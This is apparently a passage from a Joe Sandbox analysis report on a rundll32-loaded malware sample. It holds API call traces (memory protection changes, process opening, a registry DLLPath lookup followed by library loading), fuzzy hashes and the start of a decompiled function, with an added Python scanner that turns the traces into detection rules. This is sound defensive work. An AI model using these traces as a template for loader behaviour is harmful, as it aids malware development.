                                            • UnmapViewOfFile.KERNEL32(?), ref: 0580646F
                                            • CloseHandle.KERNEL32(?), ref: 05806478
                                            • SetEvent.KERNEL32(?), ref: 058064BF
                                            • GetLastError.KERNEL32(0580EC0C,00000000,00000000), ref: 058064EE
                                            • CloseHandle.KERNEL32(00000000,0580EC0C,00000000,00000000), ref: 058064FE
                                              • Part of subcall function 05815F3B: lstrlenW.KERNEL32(?,73E806E0,05822F1B,80000001,?,?,0580C229,?,?,058040AD,00000000,?,00000000,?), ref: 05815F47
                                              • Part of subcall function 05815F3B: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,0580C229,?,?,058040AD,00000000,?,00000000,?), ref: 05815F6F
                                              • Part of subcall function 05815F3B: memset.NTDLL ref: 05815F81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1106445334-0
                                            • Opcode ID: b495f3c49c9870d93dc6f76697730dfc0db1d8abecbd62e07923497a5c0eda2a
                                            • Instruction ID: 6c48ca050133d30995d1b8ef53324bd778b1248edb058cc62496b70f9874c2e2
                                            • Opcode Fuzzy Hash: b495f3c49c9870d93dc6f76697730dfc0db1d8abecbd62e07923497a5c0eda2a
                                            • Instruction Fuzzy Hash: 4321A135710704ABDBA1AB7ADC4AB5A7FECBF01620B005528FD42D21A0EB74EC908B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0581A2F0,00000000,?,?), ref: 058213D9
                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 058213E9
                                            • ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E), ref: 05821415
                                            • GetLastError.KERNEL32(?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0582143A
                                            • CloseHandle.KERNEL32(000000FF,?,?,0581A2F0,00000000,?,?,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0582144B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateErrorHandleLastReadSize
                                            • String ID:
                                            • API String ID: 3577853679-0
                                            • Opcode ID: d9854a0cdbf40bdcc3260ec976b340810b42a241df90a38ef105db7768eab702
                                            • Instruction ID: 23864f5abf0a6f6bf5134c8fa364a7ca0a5dce11d594380c13dd0a94b8acb320
                                            • Opcode Fuzzy Hash: d9854a0cdbf40bdcc3260ec976b340810b42a241df90a38ef105db7768eab702
                                            • Instruction Fuzzy Hash: DE119072100268BBDB205F68D88DEAE7E5EFB54364F218525FD1AD7190D6709CC0C6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • StrChrA.SHLWAPI(?,0000002C), ref: 0580148F
                                            • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 058014A8
                                            • StrTrimA.SHLWAPI(?,?), ref: 058014D0
                                            • StrTrimA.SHLWAPI(00000000,?), ref: 058014DF
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 05801516
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Trim$FreeHeap
                                            • String ID:
                                            • API String ID: 2132463267-0
                                            • Opcode ID: cb27be93eb6f014b0e4f825e71850f9a75136bf2bb852aa06bba2f7d22065f64
                                            • Instruction ID: bd38d5a1b32dac10e68c199ff33d495ca052a25d8446d984f695f2617504422d
                                            • Opcode Fuzzy Hash: cb27be93eb6f014b0e4f825e71850f9a75136bf2bb852aa06bba2f7d22065f64
                                            • Instruction Fuzzy Hash: 10119676200205BBDB619A59DC89FAB7FADEB48760F044021FE09DB281DB75ED01CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,0054E5A8,0581BAB4,0581D73E,?,?,?,05819DA8,76C85520,?,0581BAB4,00000000), ref: 0581B70F
                                            • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,05819DA8,76C85520,?,0581BAB4,00000000,?,00000000,0581D73E,00000000), ref: 0581B73F
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 0581B74E
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 0581B76C
                                            • GetLastError.KERNEL32(?,05819DA8,76C85520,?,0581BAB4,00000000,?,00000000,0581D73E,00000000), ref: 0581B77C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                            • String ID:
                                            • API String ID: 653387826-0
                                            • Opcode ID: d4fb0524d0f8fe0a09b34690415dd74c31adbdf4c586f5de6fbaae1e7b16b0a6
                                            • Instruction ID: dfe5191f570f4ee927b2ac63af0879a06255f0d005c7ce3ee3270f5632582509
                                            • Opcode Fuzzy Hash: d4fb0524d0f8fe0a09b34690415dd74c31adbdf4c586f5de6fbaae1e7b16b0a6
                                            • Instruction Fuzzy Hash: 7421F5B5600B05AFC720DFA8C98595ABBF8FB08214B008929EE56D7750E770FD84CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 05807BAF
                                            • GetLastError.KERNEL32 ref: 05807BD2
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05807BE5
                                            • GetLastError.KERNEL32 ref: 05807BF0
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05807C38
                                            Similarity
                                            • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait

                                            APIs
                                            • RegCreateKeyA.ADVAPI32(80000001,?,-00000005), ref: 05802F82
                                            • memcpy.NTDLL(00000000,00000001,-00000005,-00000005,-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FAB
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,-00000005), ref: 05802FD4
                                            • RegSetValueExA.ADVAPI32(-00000005,?,00000000,00000003,00000000,00000000,-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FF4
                                            • RegCloseKey.ADVAPI32(-00000005,?,05801B3D,?,00000000,-00000005,00000001), ref: 05802FFF
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            Similarity
                                            • API ID: Value$AllocateCloseCreateHeapmemcpy

                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05810B8A
                                            • memcpy.NTDLL(?,?,00000009), ref: 05810BAC
                                            • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 05810BC4
                                            • lstrlenW.KERNEL32(?,00000001,?), ref: 05810BE4
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 05810C09
                                            Similarity
                                            • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy

                                            APIs
                                            • lstrcmpi.KERNEL32(00000000,?), ref: 05811872
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0581187F
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 05811892
                                            • lstrcmpi.KERNEL32(05829460,00000000), ref: 058118B2
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0580D570,00000000), ref: 058118C6
                                            Similarity
                                            • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,05814325,00000000,00000000,00000000,00000000,00000000,?,0580479A,00000000,00000000,00000000,00000000), ref: 05815B88
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 05815BAC
                                            • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0580479A,00000000,00000000,00000000,00000000), ref: 05815BB3
                                            • lstrcpy.KERNEL32(00000000,?), ref: 05815BFB
                                            • lstrcat.KERNEL32(00000000,?), ref: 05815C0A
                                            Similarity
                                            • API ID: lstrcpy$AllocateHeaplstrcatlstrlen

                                            APIs
                                              • Part of subcall function 0581C9C0: lstrlen.KERNEL32(00000000,00000000,?,00000000,05821538,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0581C9CC
                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0581C32A
                                            • memcpy.NTDLL(00000000,?,?), ref: 0581C33D
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0581C34E
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581C363
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0581C39B
                                            Similarity
                                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy

                                            APIs
                                            • lstrlen.KERNEL32(0580B047,00000000,00000000,00000000,?,0582090A,?,0580B047,00000000), ref: 0581A968
                                            • lstrlen.KERNEL32(?,?,0582090A,?,0580B047,00000000), ref: 0581A96F
                                            • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0581A97D
                                              • Part of subcall function 05806FF3: GetLocalTime.KERNEL32(?,?,?,?,0580161B,00000000,00000001), ref: 05806FFD
                                              • Part of subcall function 05806FF3: wsprintfA.USER32 ref: 05807030
                                            • wsprintfA.USER32 ref: 0581A99F
                                              • Part of subcall function 0581EAB5: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,0581A9C7,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0581EAD3
                                              • Part of subcall function 0581EAB5: wsprintfA.USER32 ref: 0581EAF8
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0581A9D0
                                            Similarity
                                            • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem

                                            APIs
                                            • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C0CF
                                            • ResetEvent.KERNEL32(?,?,0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C0D4
                                            • GetLastError.KERNEL32(0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C0EF
                                            • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C11E
                                              • Part of subcall function 0580F123: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?,?,00000000), ref: 0580F12F
                                              • Part of subcall function 0580F123: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0581C0A9,00000000,00000000,00000004,00000000,?,0581A6B6,?), ref: 0580F18D
                                              • Part of subcall function 0580F123: lstrcpy.KERNEL32(00000000,00000000), ref: 0580F19D
                                            • SetEvent.KERNEL32(?,0581A6B6,?,?,00000000,0580D3E9,?,00000000), ref: 0581C110
                                            Similarity
                                            • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 05819F55
                                              • Part of subcall function 0580E628: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0580E63F
                                              • Part of subcall function 0580E628: SetEvent.KERNEL32(?,?,?,?,0580D3E9,?,?), ref: 0580E64F
                                            • lstrlen.KERNEL32(?,?,?,?,?,0581055F,?,?), ref: 05819F78
                                            • lstrlen.KERNEL32(?,?,?,?,0581055F,?,?), ref: 05819F82
                                            • memcpy.NTDLL(?,?,00004000,?,?,0581055F,?,?), ref: 05819F93
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,0581055F,?,?), ref: 05819FB5
                                            Similarity
                                            • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy

                                            APIs
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • lstrlenW.KERNEL32(00000000,76CDF560,00000000,?,00000000,?,?,05805512,00000020), ref: 058065E2
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058065F4
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,05805512,00000020), ref: 05806611
                                            • lstrlenW.KERNEL32(00000000,?,?,05805512,00000020), ref: 0580661D
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,05805512,00000020), ref: 05806631
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs

                                            APIs
                                            • GetModuleHandleA.KERNEL32 ref: 05819EE4
                                            • GetModuleHandleA.KERNEL32 ref: 05819EF2
                                            • LoadLibraryExW.KERNEL32(?,?,?), ref: 05819EFF
                                            • GetModuleHandleA.KERNEL32 ref: 05819F16
                                            • GetModuleHandleA.KERNEL32 ref: 05819F22
                                            Similarity
                                            • API ID: HandleModule$LibraryLoad

                                            APIs
                                            • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,05821EAE), ref: 0580B800
                                            • StrTrimA.SHLWAPI(00000001,?,?,05821EAE), ref: 0580B823
                                            • StrTrimA.SHLWAPI(00000000,?,?,05821EAE), ref: 0580B832
                                            • _strupr.NTDLL ref: 0580B835
                                            • lstrlen.KERNEL32(00000000,05821EAE), ref: 0580B83D
                                            Similarity
                                            • API ID: Trim$_struprlstrlen

                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 0580E731
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 0580E742
                                            • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,058074E7,?,?,05829448,0580340D,00000003), ref: 0580E759
                                            • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,058074E7,?,?,05829448,0580340D,00000003), ref: 0580E773
                                            • GetLastError.KERNEL32(?,?,058074E7,?,?,05829448,0580340D,00000003), ref: 0580E780
                                            Similarity
                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave

                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05815D07,?), ref: 058119A7
                                            • GetVersion.KERNEL32 ref: 058119B6
                                            • GetCurrentProcessId.KERNEL32 ref: 058119D2
                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 058119EF
                                            • GetLastError.KERNEL32 ref: 05811A0E
                                            Similarity
                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion

                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 0580F9DD
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 0580F9ED
                                            • CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 0580F9F6
                                            • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,05807779,?,?,00000040), ref: 0580FA14
                                            • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,05807779,?,?,00000040), ref: 0580FA21
                                            Similarity
                                            • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait

                                            APIs
                                            • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0581F87B
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • wsprintfA.USER32 ref: 0581F8AC
                                              • Part of subcall function 0580B175: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,05812B68), ref: 0580B18B
                                              • Part of subcall function 0580B175: wsprintfA.USER32 ref: 0580B1B3
                                              • Part of subcall function 0580B175: lstrlen.KERNEL32(?), ref: 0580B1C2
                                              • Part of subcall function 0580B175: wsprintfA.USER32 ref: 0580B202
                                              • Part of subcall function 0580B175: wsprintfA.USER32 ref: 0580B237
                                              • Part of subcall function 0580B175: memcpy.NTDLL(00000000,?,?), ref: 0580B244
                                              • Part of subcall function 0580B175: memcpy.NTDLL(00000008,058243E8,00000002,00000000,?,?), ref: 0580B259
                                              • Part of subcall function 0580B175: wsprintfA.USER32 ref: 0580B27C
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0581F921
                                              • Part of subcall function 0582240D: RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 05822423
                                              • Part of subcall function 0582240D: RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0582243E
                                            • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 0581F90B
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0581F917
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                            • String ID:
                                            • API String ID: 3553201432-0
                                            • Opcode ID: 229c2ee34e43ae6074c2fe67e24c548eacabbd40c38b9da721d95f9f99319ad2
                                            • Instruction ID: fd0311cf0b41f2316423c51432e9d358e0f9656ffa7d95bb2eee77ac58a4fcfd
                                            • Opcode Fuzzy Hash: 229c2ee34e43ae6074c2fe67e24c548eacabbd40c38b9da721d95f9f99319ad2
                                            • Instruction Fuzzy Hash: F421D7B6900249BFCF11EFA5ED49CDF7FB9FB48310B008416FE1696110D671AA64DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581F3CF
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581F3E0
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581F3F8
                                            • CloseHandle.KERNEL32(?), ref: 0581F412
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581F427
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap$CloseHandle
                                            • String ID:
                                            • API String ID: 1910495013-0
                                            • Opcode ID: 78c4734ab05bbc90f6b0f70d742d913fc39977c229a804ce507e86753bba2aa3
                                            • Instruction ID: 1f21063910dc330cde4f97c402c14af2756f30437b105ae3e64637ce78efbdc5
                                            • Opcode Fuzzy Hash: 78c4734ab05bbc90f6b0f70d742d913fc39977c229a804ce507e86753bba2aa3
                                            • Instruction Fuzzy Hash: 5B21E871605521AFD6219B65EC8886AFB6AFF48B107548514FD0AD3610CB31FCA1CBE9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05806778: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 05806793
                                              • Part of subcall function 05806778: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 058067E1
                                              • Part of subcall function 05806778: GetProcAddress.KERNEL32(00000000,?), ref: 058067FA
                                              • Part of subcall function 05806778: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0580684B
                                            • GetLastError.KERNEL32(?,?,?), ref: 05803248
                                            • FreeLibrary.KERNEL32(?,?,?), ref: 058032B0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                            • String ID:
                                            • API String ID: 1730969706-0
                                            • Opcode ID: 9849445a0e853ec27f27f0131abafae15e618ac3d954ddef4903c871d2cef28e
                                            • Instruction ID: 9ffb6758f161ccc33aa3a5e936af6f0de17249c042fa6a5c6151632a05b4c529
                                            • Opcode Fuzzy Hash: 9849445a0e853ec27f27f0131abafae15e618ac3d954ddef4903c871d2cef28e
                                            • Instruction Fuzzy Hash: A571C575E00209EFCF50DFE5C9889ADBBB9BF48305B109969E916E7290DB31AD41CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%
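The listings above follow one shape throughout the report: a bullet per call, an optional "Part of subcall function <addr>:" prefix when the call is reached through a subroutine, then Api.MODULE, an optional argument list (with "?" for values the sandbox could not resolve) and the call-site address after "ref:". The following parser and sequence scanner is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself. It is run over three entries copied from this page (the HeapFree/CloseHandle entry, the RegOpenKeyA/LoadLibraryA/GetProcAddress entry attributed to subcall 05806778, and the WaitForSingleObject/VirtualFree entry). The rule names, the helper names and the second rule are my own; HKEY_LOCAL_MACHINE (0x80000002) and MEM_RELEASE (0x8000) are the Win32 constants behind the first RegOpenKeyA argument and the third VirtualFree argument shown in those entries.

```python
# Parser and sequence scanner for the "APIs" listings of a Joe Sandbox function
# report. Added example; not part of the report or of Joe Sandbox.
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Sequence, Tuple

# Constructed sample: three entries copied from the listings on this page.
SAMPLE = """\
APIs
• HeapFree.KERNEL32(00000000,?), ref: 0581F3CF
• CloseHandle.KERNEL32(?), ref: 0581F412
APIs
  • Part of subcall function 05806778: RegOpenKeyA.ADVAPI32(80000002,Software\\Microsoft\\WAB\\DLLPath,?), ref: 05806793
  • Part of subcall function 05806778: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 058067E1
  • Part of subcall function 05806778: GetProcAddress.KERNEL32(00000000,?), ref: 058067FA
• FreeLibrary.KERNEL32(?,?,?), ref: 058032B0
APIs
• GetCurrentThreadId.KERNEL32 ref: 0580F9DD
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 0580F9ED
• VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,05807779,?,?,00000040), ref: 0580FA14
"""

# One listing line: optional subcall prefix, Api.MODULE, optional "(args)", "ref: <addr>".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_#][\w#@]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

HKEY_LOCAL_MACHINE = 0x80000002  # Win32 predefined key; first RegOpenKeyA argument above
MEM_RELEASE = 0x8000             # VirtualFree dwFreeType; third VirtualFree argument above


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]   # raw argument text; "?" is a value the sandbox did not resolve
    ref: int                # call-site address
    subcall: Optional[int]  # subroutine the call is attributed to, None for the function itself

    def arg_int(self, i: int) -> Optional[int]:
        try:
            return int(self.args[i], 16)       # the report prints arguments as hex
        except (IndexError, ValueError):
            return None


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["api"], m["mod"].upper(), args, int(m["ref"], 16), sub)


def parse_report(text: str) -> List[List[ApiCall]]:
    """Split at each "APIs" header; one list of calls per listed function."""
    blocks: List[List[ApiCall]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
        elif blocks and (call := parse_line(line)) is not None:
            blocks[-1].append(call)
    return blocks


def find_sequence(calls: Sequence[ApiCall],
                  steps: Sequence[Callable[[ApiCall], bool]]) -> Optional[List[ApiCall]]:
    """Match `steps` in listing order within one scope (top level, or one subcall address)."""
    scopes: Dict[Optional[int], List[ApiCall]] = {}
    for c in calls:
        scopes.setdefault(c.subcall, []).append(c)
    for scoped in scopes.values():
        matched: List[ApiCall] = []
        for c in scoped:
            if len(matched) < len(steps) and steps[len(matched)](c):
                matched.append(c)
        if len(matched) == len(steps):
            return matched
    return None


def _opens_dllpath_value(c: ApiCall) -> bool:
    return c.api.startswith("RegOpenKey") and any(
        a.upper().endswith("\\DLLPATH") for a in c.args)


RULES = {
    # Read a DLL path from the registry, load it, resolve an export: the
    # Software\Microsoft\WAB\DLLPath chain attributed to subcall 05806778 above.
    "registry-dllpath-load": [
        _opens_dllpath_value,
        lambda c: c.api in ("LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"),
        lambda c: c.api == "GetProcAddress",
    ],
    # Wait on a handle, then VirtualFree(MEM_RELEASE): the teardown in the
    # WaitForSingleObject/VirtualFree entry above. Rule and name are mine.
    "wait-then-virtualfree-release": [
        lambda c: c.api == "WaitForSingleObject",
        lambda c: c.api == "VirtualFree" and c.arg_int(2) == MEM_RELEASE,
    ],
}


def scan(text: str) -> List[Tuple[int, List[str]]]:
    """(lowest call-site address, matched rule names) for each listed function."""
    return [(min(c.ref for c in calls),
             [name for name, steps in RULES.items() if find_sequence(calls, steps)])
            for calls in parse_report(text) if calls]
```

Scoping by subcall address matters: the report attributes the RegOpenKeyA/LoadLibraryA/GetProcAddress calls to 05806778 and only GetLastError/FreeLibrary to the listed function itself, so a rule that ignored the prefix would mix the two call sites.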

                                            APIs
                                            • SysAllocString.OLEAUT32(?), ref: 049F33CF
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F34B4
                                              • Part of subcall function 049F5D8F: SysAllocString.OLEAUT32(049F9290), ref: 049F5DDF
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 049F3507
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F3516
                                              • Part of subcall function 049F3FDD: Sleep.KERNEL32(000001F4), ref: 049F4025
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                                            • String ID:
                                            • API String ID: 3193056040-0
                                            • Opcode ID: 95dd0be7b251a67c4cd4becfb733f16bc066415fce2ef02777d28456f178856c
                                            • Instruction ID: cdfc0880fd0dac8fcb3a99842d2898f3c6322a5a4a31064b5060df7d3badf2ef
                                            • Opcode Fuzzy Hash: 95dd0be7b251a67c4cd4becfb733f16bc066415fce2ef02777d28456f178856c
                                            • Instruction Fuzzy Hash: 2B514D75500609AFDB12CFA8D844A9EB7BAFFC8700B188439EA05DB220DB79ED45CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E049F5D8F(intOrPtr* __eax) {
                                            				void* _v8;
                                            				WCHAR* _v12;
                                            				void* _v16;
                                            				char _v20;
                                            				void* _v24;
                                            				intOrPtr _v28;
                                            				void* _v32;
                                            				intOrPtr _v40;
                                            				short _v48;
                                            				intOrPtr _v56;
                                            				short _v64;
                                            				intOrPtr* _t54;
                                            				intOrPtr* _t56;
                                            				intOrPtr _t57;
                                            				intOrPtr* _t58;
                                            				intOrPtr* _t60;
                                            				void* _t61;
                                            				intOrPtr* _t63;
                                            				intOrPtr* _t65;
                                            				short _t67;
                                            				intOrPtr* _t68;
                                            				intOrPtr* _t70;
                                            				intOrPtr* _t72;
                                            				intOrPtr* _t75;
                                            				intOrPtr* _t77;
                                            				intOrPtr _t79;
                                            				intOrPtr* _t83;
                                            				intOrPtr* _t87;
                                            				intOrPtr _t103;
                                            				intOrPtr _t109;
                                            				void* _t118;
                                            				void* _t122;
                                            				void* _t123;
                                            				intOrPtr _t130;
                                            
                                             				/* 049f5d94 */ _t123 = _t122 - 0x3c;
                                             				/* 049f5d9d */ _push( &_v8);
